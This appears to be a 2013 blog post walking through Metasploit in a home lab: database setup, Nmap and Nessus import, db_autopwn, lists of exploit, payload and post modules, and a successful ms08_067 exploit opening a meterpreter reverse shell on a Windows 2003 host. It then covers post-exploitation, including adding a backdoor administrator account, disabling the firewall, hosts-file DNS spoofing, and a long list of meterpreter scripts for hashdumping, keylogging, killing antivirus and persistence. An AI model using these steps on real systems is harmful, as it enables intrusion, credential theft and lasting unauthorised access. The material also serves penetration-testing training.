Sunday, August 25, 2013

Postgress Database in Metasploit

Metasploit comes with PostgreSQL as the default database. For the BackTrack machine, we have one more option—MySQL. You can use either of the two databases. Let us first check out the default settings of the PostgreSQL database. We will have to navigate to database.yml located under opt/framework3/config. To do this, run the following command:
root@bt:~# cd /opt/framework3/config
root@bt:/opt/framework3/config# cat database.yml
production: adapter: postgresql database: msf3 username: msf3 password: 8b826ac0 host: 127.0.0.1 port: 7175 pool: 75 timeout: 5
Notice the default username, password, and default database that has been created. Note down these values as they will be required further. You can also change these values according to your choice as well. Below is the list of commands to get started...

To start the database
Su postgres
To list the list of database
root@bt:/# su postgres
sh-4.1$ \l
sh: l: command not found
sh-4.1$ psql
psql (8.4.14)
Type "help" for help.

postgres=#
Starting postgres


user@brainfold:$ sudo -s
user@brainfold:$ postgresql-setup initdb
user@brainfold:$ systemctl start postgresql.service


Becoming the postgres user

su postgres


Creating a database user

postgres@brainfold:$ createuser msf_user -P
Enter password for new role: yourmsfpassword
Enter it again: yourmsfpassword
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
 

Creating a database

postgres@brainfold:$ createdb --owner=msf_user msf_database

Configure Metasploit

msf > db_status
[*] postgresql selected, no connection
msf> db_connect msf_user:yourmsfpassword@127.0.0.1:5432/msf_database
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
[..]
NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"
  
Enable the database on startup


$ cat > /opt/metasploit4/config/database.yml << EOF
production:
    adapter: postgresql
    database: msf_database
    username: msf_user
    password: yourmsfpassword
    host: 127.0.0.1
    port: 5432
    pool: 75
    timeout: 5
EOF
Use the database configuration file and connect to this database during each startup of msfconsole. Also change to the workspace of yur current pentesting project.
$ cat > ~/.msf4/msfconsole.rc << EOF
db_connect -y /opt/metasploit4/config/database.yml
workspace -a YourProject
EOF


Using the database


msf > db_status
[*] postgresql connected to msf_database

msf > db_nmap 192.168.1.0/24
msf > hosts
Hosts
=====
address        mac                name       os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----       -------  ---------  -----  -------  ----  --------
192.168.1.1    11:22:33:44:55:66  router     Linux    2.6.X             device        
192.168.1.100  22:33:44:55:66:77  mixer      Linux    2.6.X             device        



To export a file post scan
To export a file post scan
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /tmp/nessus_report_Host_195.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.1.195

To verify that the scanned host and vulnerability data was imported
msf > db_hosts -c address,svcs,vulns
For a complete listing of the vulnerability data that was imported
msf > db_vulns
To import the scan results
db_import ~/Desktop/winXP_vuln.nessus
Checking post import
db_hosts -c address,svcs,vulns
db_hosts -c address,svcs,vulns
Connecting to nessus within metasploit
msf > nessus_connect brainfold:prem1982@bt:8834 ok
To start the new scan
msf > nessus_scan_new




DB_nmap scan
db_nmap -v -sV 192.168.119.131

Db_autopwn
msf > db_autopwn -t -xf >
Msf > db_autopwn -t -p -e -s -b

Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

Frequently used Metasploit Modules

Top ten Windows-based browser exploits:

modules/exploits/windows/browser/ms03_020_ie_objecttype.rb   
modules/exploits/windows/browser/ie_createobject.rb          
modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb
modules/exploits/windows/browser/ms06_067_keyframe.rb        
modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb  
modules/exploits/windows/browser/aim_goaway.rb               
modules/exploits/windows/browser/winamp_playlist_unc.rb      
modules/exploits/windows/browser/winzip_fileview.rb          
modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb 
modules/exploits/windows/browser/macrovision_unsafe.rb       


Top ten auxiliary modules

These are modules that don't open a session, but are nonetheless useful for information gathering, server spoofing, cracking passwords, and pretty much any non-memory corruption / command injection activity.

modules/auxiliary/server/browser_autopwn.rb        
modules/auxiliary/scanner/smb/smb_login.rb          
modules/auxiliary/scanner/ssh/ssh_login.rb            
modules/auxiliary/scanner/http/tomcat_mgr_login.rb
modules/auxiliary/server/capture/smb.rb                  
modules/auxiliary/server/capture/http.rb                  
modules/auxiliary/scanner/telnet/telnet_login.rb        
 modules/auxiliary/scanner/http/http_login.rb                 
modules/auxiliary/scanner/mssql/mssql_login.rb            
modules/auxiliary/spoof/dns/bailiwicked_host.rb              

Top ten post modules

Post modules are what a pentester will run once a machine is compromised. These are tasks like looting stored credentials, escalating local privilege, launching a keystroke logger, activities like that. Now that we can tell what modules are getting attention, we can say confidently that what people are most interested is extending access through the domain and other machines through stolen credentials.

modules/post/windows/gather/credentials/gpp.rb              
modules/post/windows/gather/enum_chrome.rb                  
modules/post/multi/gather/firefox_creds.rb                  
modules/post/multi/gather/pidgin_cred.rb                    
modules/post/windows/escalate/service_permissions.rb    
modules/post/osx/gather/enum_osx.rb                         
modules/post/windows/gather/credentials/filezilla_server.rb 
modules/post/multi/gather/ssh_creds.rb                      
modules/post/windows/gather/smart_hashdump.rb       
modules/post/windows/gather/cachedump.rb                      
Top ten exploit payloads

Top Payloads

modules/payloads/stages/windows/shell.rb                 
modules/payloads/stages/windows/meterpreter.rb           
modules/payloads/stagers/windows/reverse_tcp.rb             
modules/payloads/stages/windows/vncinject.rb                
modules/payloads/singles/php/reverse_php.rb                 
modules/payloads/stages/windows/upexec.rb                   
modules/payloads/stagers/windows/bind_tcp.rb                
modules/payloads/stages/windows/dllinject.rb                
modules/payloads/singles/linux/x86/shell_reverse_tcp.rb     
modules/payloads/singles/windows/adduser.rb                 

Top ten Rex protocols

lib/rex/proto/http/client.rb                                
lib/rex/proto/smb/client.rb                                 
lib/rex/proto/http/packet.rb                                
lib/rex/proto/http/server.rb                                
lib/rex/proto/dcerpc/client.rb                           
lib/rex/proto/smb/constants.rb                           
lib/rex/proto/smb/simpleclient.rb                        
lib/rex/proto/smb/utils.rb                                  
lib/rex/proto/http/request.rb                            
lib/rex/proto/dhcp/server.rb                               


Post Exploitation :- Windows Shell commands

If you are trying to exploit windows 2003 or Windows Xp, the best and well known exploit is ms08_067_netapi. This post is to post exploitation and walkthrough of different commands using shell

Successful Exploit on Windows 2003
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.119.134  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.119.165  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.119.165:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.119.134
[*] Meterpreter session 1 opened (192.168.119.165:4444 -> 192.168.119.134:1043) at 2013-08-24 14:41:21 -0400

Once the exploit got executed successfully, Metasploit throws a shell back to the attacker for interacting with it. Since we are useing generic windows reverse shell, it doesn’t have much options like meterpreter shell. However a generic windows shell can be also used for pretty much of post exploitation things.  

To gain shell access








Boot and Win .ini files – these two files give you some basic information about the target system. 

Boot.ini contains the information related to running operating system (basically the options to display when the startup program is running). 

Win.ini file contains boot time settings, such as fonts, language settings, extensions, wallpaper, screensaver, communication drivers etc.
It’s good to know about the partition drives in the system so that an attacker can navigate through this and locate sensitive files


























Host files are pretty interesting one as it can be used for local system DNS spoofing. You can find an additional domain name added to the list which is pointing to the attacker’s machine (backtrack).

Host
Networks
Protocol
Services
















Netview : Try enumerating more details about the account users information. net view will show the computer/host name in the specified domain. net domain will show the domain name. net localgroup administrators will list all local administrators in the system.

It is also possible to check for the local user accounts by net user command, and further we can also add a backdoor account into the group. After we added one such account, it’s also possible to add this backdoor user account into the local administrator group for privileged access.









ipconfig command has more options to deal with the network communication, some
of them are listed below:
/? Displays this help message
/all Displays full configuration information
/release Releases the IP address for the specified adapter
/renew Renews the IP address for the specified adapter
/flushdns Purges the DNS Resolver cache
/registerdns Refreshes all DHCP leases and reregisters DNS names
/displaydns Displays the contents of the DNS Resolver Cache
/showclassid Displays all the DHCP ClassIds allowed for the specified adapter
/setclassid Modifies the DHCP ClassId














Similarly netstat command allows you to see the current network connections, routing table details etc. Routing table can be enumerated using a direct windows command “route print” as well.

More netstsat options to view the network connections initiated by respective process ID. We can see the connections established by metasploit is also listed in the output. Windows findstr command can be used to perform some smart filtering of the output
















Netsh diagnostic (diag) commands can give you network configuration details such as dns, proxy server configuration for IE, gateway, dhcp server etc. 
















netsh command ships with all windows NT systems. It can be used to enumerate a plethora of configuration information about the target. The above screen shot shows the firewall configurations in the target system.
To enable windows firewall : netsh firewall set opmode enable
To disable windows firewall : netsh firewall set opmode disable











Service Control commands can query for what are the services and it’s current status. It is also possible to start and stop these services

Meterpreter - Post Exploitation Tools

Post exploitation is an crucial step as it allows the attacker to gather information from them victim that he has exploited.A lot of penetration testers are using the metasploit framework modules for system exploitation.However Metasploit provides a bunch of useful run commands that can be used to gain understanding of the victims machine.

My home lab set-up has both Windows XP and Windows 2003 as victim's while backtrack and backbox as attackers.

This article assumes that the reader has already exploited the victim and acts as a walk-through of different commands and its output. This will be followed by another article on post exploitation with shell.

Run Arp Scanner










Run Auto Route















































Output of each individual command with winenum and scraper are saved in the following location

> /root/.msf4/logs/scripts/winenum/filename_date

Other post explotation commands are as follows
meterpreter > run
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets
run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/multi/gather/apple_ios_backup
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/multi_post
run post/multi/pro/agent
run post/multi/pro/agent_cleaner
run post/multi/pro/macro
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/bypassuac
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/ms10_092_schelevator
run post/windows/escalate/net_runtime_modify
run post/windows/escalate/screen_unlock
run post/windows/escalate/service_permissions
run post/windows/gather/arp_scanner
run post/windows/gather/bitcoin_jacker
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domains
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_proxy
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_unattend
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/hashdump
run post/windows/gather/memory_grep
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/screenshot
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/manage/add_user_domain
run post/windows/manage/autoroute
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/enable_rdp
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server
run post/windows/manage/payload_inject
run post/windows/manage/persistence
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/pxexploit
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/sdel
run post/windows/manage/smart_migrate
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/recon/computer_browser_discovery
run post/windows/recon/resolve_hostname
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_profile
run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run win32-sshclient
run win32-sshserver
run winbf
run winenum

run wmic